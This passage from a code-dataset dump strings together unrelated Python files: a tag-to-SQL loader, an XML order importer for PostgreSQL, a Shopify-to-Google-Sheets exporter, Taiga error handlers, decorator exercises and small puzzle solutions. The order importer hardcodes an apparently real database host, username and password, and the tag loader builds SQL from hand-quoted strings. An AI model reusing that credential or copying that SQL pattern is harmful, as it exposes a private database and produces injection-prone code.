\"\"\" 标签信息类\n 主要负责载入标签信息文件,生成插入数据库t_tag和t_tag_value表的信息\n \"\"\"\n\n def __init__(self, file_path, custom_id, db_config):\n # 标签值表文件路径\n self.file_path = file_path\n self.custom_id = custom_id\n self.tags = []\n self.tag_attrs = []\n self.tag_1_attrs = []\n self.tag_1_ids = {}\n self.db = DBApi(db_config)\n\n # 当前时间\n self.curr_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n\n # 读取标签文件\n self.read_tag_file()\n\n def read_tag_file(self):\n \"\"\" 读标签值表\n :type tables: \n :param tables: \n :rtype: list\n :return: 标签值表中内容载入二维list\n \"\"\"\n # 读取文件\n with open(self.file_path, 'r', encoding='gbk') as f:\n for line in f.readlines():\n self.tags.append(line.strip('\\n').split(','))\n print(self.tags)\n\n # 解析第一行,确定字段位置\n def pos(str1):\n return self.tags[0].index(str1) if str1 in self.tags[0] else 0\n\n tag_attrs_pos = dict(zip(TAG_ATTRS_MAP, (map(pos, TAG_ATTRS_MAP.values()))))\n print(tag_attrs_pos)\n\n # 标签信息行结构化\n self.tag_attrs = []\n for line in self.tags[1:]:\n tag_attr = {'level_1': line[tag_attrs_pos['level_1']],\n 'level_2': line[tag_attrs_pos['level_2']],\n 'level_2_eng': line[tag_attrs_pos['level_2_eng']],\n 'multi': True if line[tag_attrs_pos['multi']] == '是' else False,\n 'level_3s': list(filter(None, line[tag_attrs_pos['level_3_base']:]))}\n self.tag_attrs.append(tag_attr)\n print(self.tag_attrs[-1])\n\n # 一级标签信息列表\n self.tag_1_attrs = []\n for tag_attr in self.tag_attrs:\n if tag_attr['level_1'] not in self.tag_1_attrs:\n self.tag_1_attrs.append(tag_attr['level_1'])\n print(self.tag_1_attrs)\n\n def tag_level_1_prc(self):\n \"\"\" 处理一级标签\n :type tables: \n :param tables: \n :rtype: \n :return: \n \"\"\"\n\n # 生成insert语句\n def trans(str1):\n return \"'\" + str1 + \"'\"\n\n sqls = []\n for line in self.tag_1_attrs:\n template_dict = {\n 't_tag': TABLE_NAME_T_TAG,\n 'customer_id': self.custom_id,\n 'pid': 0,\n 'tag_name': trans(line),\n 'tag_define': 'null',\n 'dld_field_name': 'null',\n 'create_time': trans(self.curr_time),\n 'update_time': trans(self.curr_time),\n 'status': 1,\n }\n sql = t_tag_ins_template.substitute(template_dict)\n sqls.append(sql)\n print(sql)\n\n # 写入sql文件\n with open('../../outfile/t_tag_ins.sql', 'w+', encoding='utf8') as f:\n f.write('-- -------------------------------\\n')\n f.write('-- Records of ' + self.curr_time + '\\n')\n f.write('-- -------------------------------\\n')\n f.write('-- 一级标签\\n')\n for line in sqls:\n f.write(line + '\\n')\n\n # 执行sql\n for sql in sqls:\n print(self.db.modify(sql))\n\n # 在标签数据库t_tag中读取一级标签的id,因为二级标签需要设置其父id\n sql = 'select id from t_tag where status = 1 and ' \\\n 'customer_id = %(customer_id)s and pid = 0 and tag_name = %(tag_name)s'\n self.tag_1_ids = {}\n for line in self.tag_1_attrs:\n self.tag_1_ids[line] = self.db.query_one(sql, {\"customer_id\": self.custom_id, \"tag_name\": line})[0]\n print(self.tag_1_ids)\n\n def tag_level_2_prc(self):\n \"\"\" 处理二级标签\n :type tables: \n :param tables: \n :rtype: \n :return: \n \"\"\"\n\n # 生成insert语句\n def trans(str1):\n return \"'\" + str1 + \"'\"\n\n sqls = []\n for tag_attr in self.tag_attrs:\n template_dict = {\n 't_tag': TABLE_NAME_T_TAG,\n 'customer_id': self.custom_id,\n 'pid': self.tag_1_ids[tag_attr['level_1']],\n 'tag_name': trans(tag_attr['level_2']),\n 'tag_define': 'null',\n 'dld_field_name': trans('t_u_' + tag_attr['level_2_eng']),\n 'create_time': trans(self.curr_time),\n 'update_time': trans(self.curr_time),\n 'status': 1,\n }\n sql = t_tag_ins_template.substitute(template_dict)\n sqls.append(sql)\n print(sql)\n\n # 写入sql文件\n with open('../../outfile/t_tag_ins.sql', 'a+', encoding='utf8') as f:\n f.write('\\n-- 二级标签\\n')\n for line in sqls:\n f.write(line + '\\n')\n\n # 执行sql\n for sql in sqls:\n print(self.db.modify(sql))\n\n # 读取二级标签的id,因为三级标签需要设置其二级标签id\n sql = 'select id from t_tag where status = 1 and ' \\\n 'customer_id = %(customer_id)s and pid = %(pid)s and tag_name = %(tag_name)s'\n for tag_attr in self.tag_attrs:\n tag_attr['level_2_id'] = self.db.query_one(sql, {\"customer_id\": self.custom_id,\n \"pid\": self.tag_1_ids[tag_attr['level_1']],\n \"tag_name\": tag_attr['level_2']})[0]\n print(self.tag_attrs)\n\n def tag_level_3_prc(self):\n \"\"\" 处理三级标签\n :type tables: \n :param tables: \n :rtype: \n :return: \n \"\"\"\n\n # 生成insert语句\n def trans(str1):\n return \"'\" + str1 + \"'\"\n\n sqls = []\n for tag_attr in self.tag_attrs:\n for idx, level_3 in enumerate(tag_attr['level_3s']):\n tag_field_name = 't_u_' + tag_attr['level_2_eng']\n template_dict = {\n 't_tag_value': TABLE_NAME_T_TAG_VALUE,\n 'tag_id': tag_attr['level_2_id'],\n 'value_name': trans(level_3),\n 'match_rule': trans('eq'),\n 'match_val': trans('1') if tag_attr['multi'] else trans(str(idx)),\n 'tag_field_name': trans(tag_field_name + '_' + str(idx))\n if tag_attr['multi'] else trans(tag_field_name),\n 'create_time': trans(self.curr_time),\n 'update_time': trans(self.curr_time),\n 'status': 1,\n }\n sql = t_tag_value_ins_template.substitute(template_dict)\n sqls.append(sql)\n print(sql)\n\n # 写入sql文件\n with open('../../outfile/t_tag_value_ins.sql', 'w+', encoding='utf8') as f:\n f.write('-- -------------------------------\\n')\n f.write('-- Records of ' + self.curr_time + '\\n')\n f.write('-- -------------------------------\\n')\n f.write('-- 三级标签\\n')\n for line in sqls:\n f.write(line + '\\n')\n\n # 执行sql\n for sql in sqls:\n print(self.db.modify(sql))\n\n\nif __name__ == \"__main__\":\n t = TagInfoPrc(TAG_FILE_PATH, CUSTOM_ID, DB_CONFIG)\n t.tag_level_1_prc()\n t.tag_level_2_prc()\n t.tag_level_3_prc()\n print(\"Finish\")\n","repo_name":"super-season/centos-yum-mount","sub_path":"python/fcmp_tag_logic_py-zlz-liu/src/TagBase/tag_info_prc.py","file_name":"tag_info_prc.py","file_ext":"py","file_size_in_byte":8026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40976166617","text":"# -*- coding: utf-8 -*\n\nif __name__ == '__main__':\n # Variaveis\n vetor = []\n\n # Capturar os 100 valores do vetor\n while(len(vetor) < 100):\n # Entrada\n valor = float(input())\n vetor.append(valor)\n\n # Restricao para impressao dos valores\n if(valor <= 10):\n # Resultado\n print(\"A[\" + str(len(vetor) - 1) + \"] = %.1f\" % valor)","repo_name":"CleitonSilvaT/URI_Python","sub_path":"1-Iniciante/1174.py","file_name":"1174.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25768703541","text":"import xml.etree.ElementTree as ET\r\nimport psycopg2\r\nimport datetime\r\n\r\n\r\ndef db_inserir_ordem(numero_de_ordem, tipo_de_ordem, quantidade, peca_inicial, peca_final, destino, hora_entrada_ordem):\r\n \r\n connection= psycopg2.connect(host=\"db.fe.up.pt\", database=\"up201603858\", user=\"up201603858\", password=\"onr482mNS\", port=\"5432\")\r\n connection.autocommit= True\r\n cursor = connection.cursor()\r\n \r\n sql_insert_query = (\"\"\"INSERT INTO \"Ordens\" (\"ID\",\"Tipo\",\"estado\",\"pecas_processadas\",\"pecas_em_processamento\",\"pecas_pendentes\",\"peca_inicial\", \"peca_final\", \"Destino\", \"hora_entrada_ordem\") VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\"\")\r\n \r\n insert_tuple = (numero_de_ordem , tipo_de_ordem, 'pendente','0', '0', quantidade, peca_inicial, peca_final, destino, hora_entrada_ordem)\r\n \r\n cursor.execute(sql_insert_query, insert_tuple)\r\n \r\n connection.commit()\r\n \r\n connection.close()\r\n\r\n return\r\n\r\n\r\n \r\ntree = ET.parse('command4.xml') \r\nroot = tree.getroot()\r\n\r\nfor order in root: #can be a order(transform ou unload) or a upload\r\n hora_entrada_ordem = datetime.datetime.now()\r\n\r\n if(order.tag == 'Request_Stores'):\r\n print('Ordem de carga')\r\n ## ----------- manda a ordem de carga para o PLC ?? --------- ######\r\n elif(order.tag == 'Order'):\r\n numero_de_ordem = order.get('Number')\r\n print('numero de ordem: ' + numero_de_ordem)\r\n for transform in order.iter('Transform'):\r\n tipo_de_ordem = str(transform.tag)\r\n print('tipo de ordem: '+ tipo_de_ordem)\r\n peca_inicial = transform.get('From')\r\n peca_final = transform.get('To')\r\n destino=0\r\n print('Transformar P'+peca_inicial[1]+ ' em P'+ peca_final[1])\r\n quantidade = transform.get('Quantity')\r\n print('Numa quantidade: '+ quantidade)\r\n print()\r\n \r\n \r\n\r\n for unload in order.iter('Unload'):\r\n tipo_de_ordem = str(unload.tag)\r\n print('tipo de ordem: '+ tipo_de_ordem)\r\n peca = unload.get('Type')\r\n print('Unload da P'+peca_inicial[1])\r\n destino = unload.get('Destination')\r\n print('Para o destino: '+ destino[1])\r\n quantidade = unload.get('Quantity')\r\n print('Numa quantidade: '+ quantidade)\r\n \r\n \r\n db_inserir_ordem(numero_de_ordem, tipo_de_ordem, quantidade, peca_inicial, peca_final, destino, hora_entrada_ordem)\r\n print(destino)\r\n \r\n\r\nprint('conexao feita')\r\n\r\n\r\n\r\n","repo_name":"MIEEC/test","sub_path":"codigo/read_xml_e_bd_inicial.py","file_name":"read_xml_e_bd_inicial.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29135854546","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport httplib2\nimport os\nimport time\nimport json\nimport shopify\nimport configparser\nimport requests\n\nfrom apiclient import discovery\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\n\ntry:\n import argparse\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\nexcept ImportError:\n flags = None\n\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/sheets.googleapis.com-python-quickstart.json\nSCOPES = 'https://www.googleapis.com/auth/spreadsheets'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Hunger Work Studio Orders'\n\n# SHOPIFY Portion\nconfig = configparser.ConfigParser()\nconfig.read('shopify.ini')\n\nAPI_KEY = config['SHOPIFY']['API_KEY']\nPASSWORD = config['SHOPIFY']['PASSWORD']\nSHOP_NAME = config['SHOPIFY']['SHOP_NAME']\n\nshop_url = \"https://%s:%s@%s.myshopify.com/admin\" % (API_KEY, PASSWORD, SHOP_NAME)\nshopify.ShopifyResource.set_site(shop_url)\nshop = shopify.Shop.current()\n\n# Grab Shopify Orders\norder_url = \"https://%s:%s@%s.myshopify.com/admin/orders.json\" % (API_KEY, PASSWORD, SHOP_NAME)\nresponse = requests.get(order_url)\njson_data = json.loads(response.content)\n\n# write to file (optional; uncomment to enable)\n# filename = 'orders-[%s].txt' % time.ctime()\n\n# with open('neworders1.txt', 'w') as outfile:\n # json.dump(json_data, outfile)\n\n# Save Order details into python dictionary to send to Google Sheets API\nordersData = []\norderDetails = ['Last Updated', 'Email', 'Customer ID', 'IP', 'Title', 'Properties']\n# orderDetails = ['Email', 'IP', 'Title', 'Name1', 'Value1', 'Name2', 'Value2', 'Name3', 'Value3', 'Name4', 'Value4', 'Name5', 'Value5']\nordersData += [orderDetails]\n\nfor i in json_data['orders']:\n for line in i['line_items']:\n # Check for specific order name\n if 'Create/Update Event Entry' in line['title']:\n lastUpdated = i['updated_at']\n title = line['title']\n properties = str(line['properties'])\n ip = i['client_details']['browser_ip']\n try:\n email = i['customer']['email']\n except KeyError:\n # no email\n print('No email for order')\n email = 'No email for order'\n customer_id = i['customer']['id']\n ordersData.append([lastUpdated, email, customer_id, ip, title, properties])\n\ndataToInsert = { 'values': ordersData }\n\n\n# Google Sheets API authentication\ndef get_credentials():\n \"\"\"Gets valid user credentials from storage.\n\n If nothing has been stored, or if the stored credentials are invalid,\n the OAuth2 flow is completed to obtain the new credentials.\n\n Returns:\n Credentials, the obtained credential.\n \"\"\"\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'sheets.googleapis.com-python-quickstart.json')\n\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n if flags:\n credentials = tools.run_flow(flow, store, flags)\n else: # Needed only for compatibility with Python 2.6\n credentials = tools.run(flow, store)\n print('Storing credentials to ' + credential_path)\n return credentials\n\ndef main():\n \"\"\" Authenticate with OAuth, create a timestamped Sheet with orders\n \"\"\"\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n 'version=v4')\n service = discovery.build('sheets', 'v4', http=http,\n discoveryServiceUrl=discoveryUrl)\n \n data = dataToInsert\n \n SHEET_ID = '1dO3YavokqF72F_tzXhiw-OJdXy5MkBhDxtT3rSmfBzo'\n\n service.spreadsheets().values().update(spreadsheetId=SHEET_ID,\n range='Sheet1', body=data, valueInputOption='RAW').execute()\n print('Wrote data to Sheet:')\n rows = service.spreadsheets().values().get(spreadsheetId=SHEET_ID,\n range='Sheet1').execute().get('values', [])\n for row in rows:\n print(row)\n\nif __name__ == '__main__':\n main()\n","repo_name":"kialam/hws-shopify-sheets-integration","sub_path":"googlesheets.py","file_name":"googlesheets.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33541108842","text":"class Solution:\n def isPalindrome(self, s: str) -> bool:\n \"\"\"\n INPUT: string s\n OUTPUT: true if palindrome, false if not\n NOTE:\n \n ignore spaces,\n ignore commas\n contains numbers\n \n SOLUTION:\n \n \"\"\"\n s_list = [i.lower() for i in s if i.isalnum()]\n \n s_len = len(s_list)\n mid = s_len // 2\n for i in range(mid):\n if s_list[i] != s_list[s_len - i - 1]: return False\n \n return True","repo_name":"n-alex-goncalves/Leetcode-Blind-75","sub_path":"leetcode answers/Valid Palindrome.py","file_name":"Valid Palindrome.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"23931683708","text":"import http\n\nfrom fastapi.encoders import jsonable_encoder\nfrom fastapi.exceptions import RequestValidationError\nfrom starlette.exceptions import HTTPException\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\nfrom starlette.status import HTTP_400_BAD_REQUEST, HTTP_422_UNPROCESSABLE_ENTITY\nfrom taiga.base.services.exceptions import TaigaServiceException\nfrom taiga.base.utils.strings import camel_to_kebab\nfrom taiga.exceptions.api import HTTPException as TaigaHTTPException\nfrom taiga.exceptions.api import codes\n\n\nasync def http_exception_handler(request: Request, exc: HTTPException) -> JSONResponse:\n if isinstance(exc, TaigaHTTPException):\n http_exc_code = getattr(exc, \"code\", codes.EX_UNKNOWN.code)\n http_exc_msg = getattr(exc, \"msg\", codes.EX_UNKNOWN.msg)\n else: # Starlette's HTTPException\n http_exc_code = http.HTTPStatus(exc.status_code).phrase.replace(\" \", \"-\").lower()\n http_exc_msg = http.HTTPStatus(exc.status_code).description\n\n http_exc_detail = exc.detail\n\n content = {\n \"error\": {\n \"code\": http_exc_code,\n \"detail\": http_exc_detail,\n \"msg\": http_exc_msg,\n }\n }\n\n headers = getattr(exc, \"headers\", None)\n if headers:\n return JSONResponse(status_code=exc.status_code, content=content, headers=headers)\n else:\n return JSONResponse(status_code=exc.status_code, content=content)\n\n\nasync def taiga_service_exception_handler(request: Request, exc: TaigaServiceException) -> JSONResponse:\n return JSONResponse(\n status_code=HTTP_400_BAD_REQUEST,\n content={\n \"error\": {\n \"code\": codes.EX_BAD_REQUEST.code,\n \"detail\": camel_to_kebab(exc.__class__.__name__),\n \"msg\": str(exc),\n }\n },\n )\n\n\nasync def request_validation_exception_handler(request: Request, exc: RequestValidationError) -> JSONResponse:\n return JSONResponse(\n status_code=HTTP_422_UNPROCESSABLE_ENTITY,\n content={\n \"error\": {\n \"code\": codes.EX_VALIDATION_ERROR.code,\n \"detail\": jsonable_encoder(exc.errors()),\n \"msg\": codes.EX_VALIDATION_ERROR.msg,\n }\n },\n )\n","repo_name":"taigaio/taiga","sub_path":"python/apps/taiga/src/taiga/exceptions/api/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"75"} +{"seq_id":"41264214587","text":"# https: // pythonbasics.org/decorators/\n\nimport requests\nfrom ast import arg\nfrom time import perf_counter\nimport tracemalloc\nfrom functools import wraps\nfrom datetime import datetime\nimport sys\nimport time\n\n\ndef hello(): # type: ignore\n print(\"Hello\")\n\n\nmessage = hello\n\n# Uncomment to check below decorator function\nmessage()\n\n\ndef hello(func):\n def inner():\n print(\"Hello\")\n func()\n return inner\n\n\n@hello\ndef name():\n print(\"Alice\")\n\n# Uncomment to check below decorator function\n# obj = hello(name)\n# obj()\n# name()\n\n\ndef dec_sum_ab(func):\n def inner(a, b):\n print(str(a) + \" + \"+str(b)+\" is \", end=\"\")\n return func(a, b)\n\n return inner\n\n\n@dec_sum_ab\ndef sum_ab(a, b):\n res = a + b\n print(res)\n\n# Uncomment to check below decorator function\n# sum_ab(3, 4)\n\n\n\"\"\" \n Real world examples\n Use Case: Time measurement\n\n\"\"\"\n\n\ndef measure_time(func):\n\n def wrapper(*arg):\n t = time.time()\n res = func(*arg)\n\n print(\"Function took \" + str(time.time()-t) + \" seconds to run\")\n\n return res\n return wrapper\n\n\n@measure_time\ndef my_func(n): # type: ignore\n time.sleep(n)\n\n# my_func(2)\n\n# What is a Python Decorator\n# The \"decorators\" we talk about with concern to Python are not exactly the same thing as the DecoratorPattern described above. A Python decorator is a specific change to the Python syntax that allows us to more conveniently alter functions and methods (and possibly classes in a future version). This supports more readable applications of the DecoratorPattern but also other uses as well.\n\n\ndef simple_decorator(decorator):\n '''This decorator can be used to turn simple functions\n into well-behaved decorators, so long as the decorators\n are fairly simple. If a decorator expects a function and\n returns a function (no descriptors), and if it doesn't\n modify function attributes or docstring, then it is\n eligible to use this. Simply apply @simple_decorator to\n your decorator and it will automatically preserve the\n docstring and function attributes of functions to which\n it is applied.'''\n def new_decorator(f):\n g = decorator(f)\n g.__name__ = f.__name__\n g.__doc__ = f.__doc__\n g.__dict__.update(f.__dict__)\n return g\n # Now a few lines needed to make simple_decorator itself\n # be a well-behaved decorator.\n new_decorator.__name__ = decorator.__name__\n new_decorator.__doc__ = decorator.__doc__\n new_decorator.__dict__.update(decorator.__dict__)\n return new_decorator\n\n#\n# Sample Use:\n#\n\n\n@simple_decorator\ndef my_simple_logging_decorator(func):\n def you_will_never_see_this_name(*args, **kwargs):\n print('calling {}'.format(func.__name__))\n print(*args)\n print(**kwargs)\n return func(*args, **kwargs)\n return you_will_never_see_this_name\n\n\n@my_simple_logging_decorator\ndef double(x):\n 'Doubles a number.'\n return 2 * x\n\n\nassert double.__name__ == 'double'\nassert double.__doc__ == 'Doubles a number.'\n# Uncomment to check below decorator function\n# print(double(155))\n\n\"\"\"\n\"\"\"\n\n\ndef propget(func):\n locals = sys._getframe(1).f_locals\n name = func.__name__\n prop = locals.get(name)\n if not isinstance(prop, property):\n prop = property(func, doc=func.__doc__)\n else:\n doc = prop.__doc__ or func.__doc__\n prop = property(func, prop.fset, prop.fdel, doc)\n return prop\n\n\ndef propset(func):\n locals = sys._getframe(1).f_locals\n name = func.__name__\n prop = locals.get(name)\n if not isinstance(prop, property):\n prop = property(None, func, doc=func.__doc__)\n else:\n doc = prop.__doc__ or func.__doc__\n prop = property(prop.fget, func, prop.fdel, doc)\n return prop\n\n\ndef propdel(func):\n locals = sys._getframe(1).f_locals\n name = func.__name__\n prop = locals.get(name)\n if not isinstance(prop, property):\n prop = property(None, None, func, doc=func.__doc__)\n else:\n prop = property(prop.fget, prop.fset, func, prop.__doc__)\n return prop\n\n# These can be used like this:\n\n\nclass Example(object):\n\n @propget\n def myattr(self):\n return self._half * 2\n\n @propset\n def myattr(self, value):\n self._half = value / 2\n\n @propdel\n def myattr(self):\n del self._half\n\n\n# WHAT_TO_DEBUG = set(['io', 'core']) # change to what you need\n\n\n# class debug:\n# '''Decorator which helps to control what aspects of a program to debug\n# on per-function basis. Aspects are provided as list of arguments.\n# It DOESN'T slowdown functions which aren't supposed to be debugged.\n# '''\n\n# def __init__(self, aspects=None):\n# self.aspects = set(aspects)\n\n# def __call__(self, f):\n# if self.aspects & WHAT_TO_DEBUG:\n# def newf(*args, **kwds):\n# print ( sys.stderr, f.func_name, args, kwds)\n# f_result = f(*args, **kwds)\n# print ( sys.stderr, f.func_name, \"returned\", f_result)\n# return f_result\n# newf.__doc__ = f.__doc__\n# return newf\n# else:\n# return f\n\n\n# @debug(['io'])\n# def prn(x):\n# print (x)\n\n\n# @debug(['core'])\n# def mult(x, y):\n# return x * y\n\n\n# prn(mult(2, 2))\n\n# Read below examples when you want to revise decorators\n# https: // python-3-patterns-idioms-test.readthedocs.io/en/latest/PythonDecorators.html\n\n# What Can You Do With Decorators?\n# Decorators allow you to inject or modify code in functions or classes. Sounds a bit like Aspect-Oriented Programming(AOP) in Java, doesn’t it? Except that it’s both much simpler and (as a result) much more powerful. For example, suppose you’d like to do something at the entry and exit points of a function(such as perform some kind of security, tracing, locking, etc. – all the standard arguments for AOP). With decorators, it looks like this:\n\n# Class as decorators\nclass entry_exit(object): # type: ignore\n\n def __init__(self, f):\n self.f = f\n\n def __call__(self):\n print(\"Entering\", self.f.__name__)\n self.f()\n print(\"Exited\", self.f.__name__)\n\n\n@entry_exit\ndef func1(): # type: ignore\n print(\"inside func1()\")\n\n\n@entry_exit\ndef func2(): # type: ignore\n print(\"inside func2()\")\n\n\nfunc1()\nfunc2()\n\n\nprint()\n\n# Functions as decorators\n\n\ndef entry_exit(f):\n def new_f():\n print(\"Entering\", f.__name__)\n f()\n print(\"Exited\", f.__name__)\n new_f.__name__ = f.__name__\n return new_f\n\n\n@entry_exit\ndef func1():\n print(\"inside func1()\")\n\n\n@entry_exit\ndef func2():\n print(\"inside func2()\")\n\n\nfunc1()\nfunc2()\nprint(func1.__name__+\"\\n\")\n\n\n# Python Decorators without arguments\nclass decorator_without_arguments(object):\n\n def __init__(self, f):\n \"\"\"\n If there are no decorator arguments, the function\n to be decorated is passed to the constructor.\n \"\"\"\n print(\"Inside __init__()\")\n self.f = f\n\n def __call__(self, *args):\n \"\"\"\n The __call__ method is not called until the\n decorated function is called.\n \"\"\"\n print(\"Inside __call__()\")\n self.f(*args)\n print(\"After self.f(*args)\")\n\n\n@decorator_without_arguments\ndef sayHello(a1, a2, a3, a4):\n print('sayHello arguments:', a1, a2, a3, a4)\n\n\nprint(\"After decoration\")\n\nprint(\"Preparing to call sayHello()\")\nsayHello(\"say\", \"hello\", \"argument\", \"list\")\nprint(\"After first sayHello() call\")\nsayHello(\"a\", \"different\", \"set of\", \"arguments\")\nprint(\"After second sayHello() call\\n\")\n# Notice that __init__() is the only method called to perform decoration, and __call__() is called every time you call the decorated sayHello().\n\n\n# Python Decorators with arguments.py\nclass decorator_with_arguments(object):\n\n def __init__(self, arg1, arg2, arg3):\n \"\"\"\n If there are decorator arguments, the function\n to be decorated is not passed to the constructor!\n \"\"\"\n print(\"Inside __init__()\")\n self.arg1 = arg1\n self.arg2 = arg2\n self.arg3 = arg3\n\n def __call__(self, f):\n \"\"\"\n If there are decorator arguments, __call__() is only called\n once, as part of the decoration process! You can only give\n it a single argument, which is the function object.\n \"\"\"\n print(\"Inside __call__()\")\n\n def wrapped_f(*args):\n print(\"Inside wrapped_f()\")\n print(\"Decorator arguments:\", self.arg1, self.arg2, self.arg3)\n f(*args)\n print(\"After f(*args)\")\n return wrapped_f\n\n\n@decorator_with_arguments(\"hello\", \"world\", 42)\ndef sayHello(a1, a2, a3, a4):\n print('sayHello arguments:', a1, a2, a3, a4)\n\n\nprint(\"After decoration\")\n\nprint(\"Preparing to call sayHello()\")\nsayHello(\"say\", \"hello\", \"argument\", \"list\")\nprint(\"after first sayHello() call\")\nsayHello(\"a\", \"different\", \"set of\", \"arguments\")\nprint(\"after second sayHello() call\")\n# Now the process of decoration calls the constructor and then immediately invokes __call__(), which can only take a single argument (the function object) and must return the decorated function object that replaces the original. Notice that __call__() is now only invoked once, during decoration, and after that the decorated function that you return from __call__() is used for the actual calls.\n\n# Although this behavior makes sense – the constructor is now used to capture the decorator arguments, but the object __call__() can no longer be used as the decorated function call, so you must instead use __call__() to perform the decoration – it is nonetheless surprising the first time you see it because it’s acting so much differently than the no-argument case, and you must code the decorator very differently from the no-argument case.\n\n\n# Python Decorators_function_with_arguments\ndef decorator_function_with_arguments(arg1, arg2, arg3):\n def wrap(f):\n print(\"Inside wrap()\")\n\n def wrapped_f(*args):\n print(\"Inside wrapped_f()\")\n print(\"Decorator arguments:\", arg1, arg2, arg3)\n f(*args)\n print(\"After f(*args)\")\n return wrapped_f\n return wrap\n\n\n@decorator_function_with_arguments(\"hello\", \"world\", 42)\ndef sayHello(a1, a2, a3, a4):\n print('sayHello arguments:', a1, a2, a3, a4)\n\n\nprint(\"After decoration\")\n\nprint(\"Preparing to call sayHello()\")\nsayHello(\"say\", \"hello\", \"argument\", \"list\")\nprint(\"after first sayHello() call\")\nsayHello(\"a\", \"different\", \"set of\", \"arguments\")\nprint(\"after second sayHello() call\")\n\nprint()\n\n# https://www.freecodecamp.org/news/python-decorators-explained-with-examples/\n# When to Use a Decorator in Python\n# You'll use a decorator when you need to change the behavior of a function without modifying the function itself. A few good examples are when you want to add logging, test performance, perform caching, verify permissions, and so on.\n\n# You can also use one when you need to run the same code on multiple functions. This avoids you writing duplicating code.\n\n\ndef log_datetime(func):\n \"\"\"\n Log the date and time of a function \n \"\"\"\n\n def wrapper():\n print(\n f'Function: {func.__name__}\\nRun on: {datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")}')\n print(f'{\"-\"*30}')\n func()\n\n return wrapper\n\n\n@log_datetime\ndef daily_backup():\n print('Daily backup job has finished\\n')\n\n\nprint(daily_backup)\ndaily_backup()\n\n\ndef my_decorator_func(func):\n\n @wraps(func)\n # Functools wraps will update the decorator with the decorated functions attributes\n def wrapper_func(*args, **kwargs):\n func(*args, **kwargs)\n return wrapper_func\n\n\n@my_decorator_func\ndef my_func(my_args):\n '''Example docstring for function'''\n\n pass\n\n\nprint(my_func.__name__)\nprint(my_func.__doc__)\n\nprint()\n\n\ndef measure_performance(func):\n \"\"\"\n Measure performance of a function\n \"\"\"\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n tracemalloc.start()\n start_time = perf_counter()\n func(*args, **kwargs)\n current, peak = tracemalloc.get_traced_memory()\n finish_time = perf_counter()\n print(f'Function: {func.__name__}')\n print(f'Method: {func.__doc__}')\n print(f'Memory usage:\\t\\t {current/10**6:.6f} MB \\n'\n f'Peak memory usage:\\t {peak/10**6:.6f} MB')\n print(f'Time elapsed in seconds: {finish_time - start_time:.6f}')\n print(f'{\"-\"*40}')\n tracemalloc.stop()\n return wrapper\n\n\n@measure_performance\ndef make_list1():\n \"\"\"Range\"\"\"\n my_list = list(range(100000))\n\n\n@measure_performance\ndef make_list2():\n \"\"\"List comprehension\"\"\"\n my_list = [l for l in range(100000)]\n\n\n@measure_performance\ndef make_list3():\n \"\"\"Append\"\"\"\n my_list = []\n for item in range(100000):\n my_list.append(item)\n\n\n@measure_performance\ndef make_list4():\n \"\"\"Concatenation\"\"\"\n\n my_list = []\n for item in range(100000):\n my_list = my_list + [item]\n\n\nprint(make_list1())\nprint(make_list2())\nprint(make_list3())\nprint(make_list4())\n\n\nclass LimitQuery:\n def __init__(self, func):\n self.func = func\n self.count = 0\n\n def __call__(self, *args, **kwargs):\n self.limit = args[0]\n if self.count < self.limit:\n self.count += 1\n return self.func(*args, **kwargs)\n else:\n print(f'No queries left. All {self.count} queries used')\n return\n\n\n@LimitQuery\ndef get_coint_price(limit):\n \"\"\"\n View the bitcoin price index(BPI)\n \"\"\"\n\n url = requests.get('https://api.coindesk.com/v1/bpi/currentprice.json')\n\n if url.status_code == 200:\n text = url.json()\n return f\"${float(text['bpi']['USD']['rate_float']):.2f}\"\n\n\nprint(get_coint_price(5))\nprint(get_coint_price(5))\nprint(get_coint_price(5))\nprint(get_coint_price(5))\nprint(get_coint_price(5))\nprint(get_coint_price(5))\n\n# https://www.freecodecamp.org/news/python-decorators-explained-with-examples/\n","repo_name":"sonyjames9/python","sub_path":"code-practice/concepts/decorators_prac.py","file_name":"decorators_prac.py","file_ext":"py","file_size_in_byte":13940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14185138671","text":"'''\nRuntime: 4510 ms, faster than 5.23% of Python3 online submissions for My Calendar III.\nMemory Usage: 14.7 MB, less than 56.62% of Python3 online submissions for My Calendar III.\n'''\nfrom sortedcontainers import SortedDict\n\nclass MyCalendarThree:\n\n def __init__(self):\n self.diff = SortedDict()\n\n def book(self, start: int, end: int) -> int:\n self.diff[start] = self.diff.get(start, 0) + 1\n self.diff[end] = self.diff.get(end, 0) - 1\n cur = 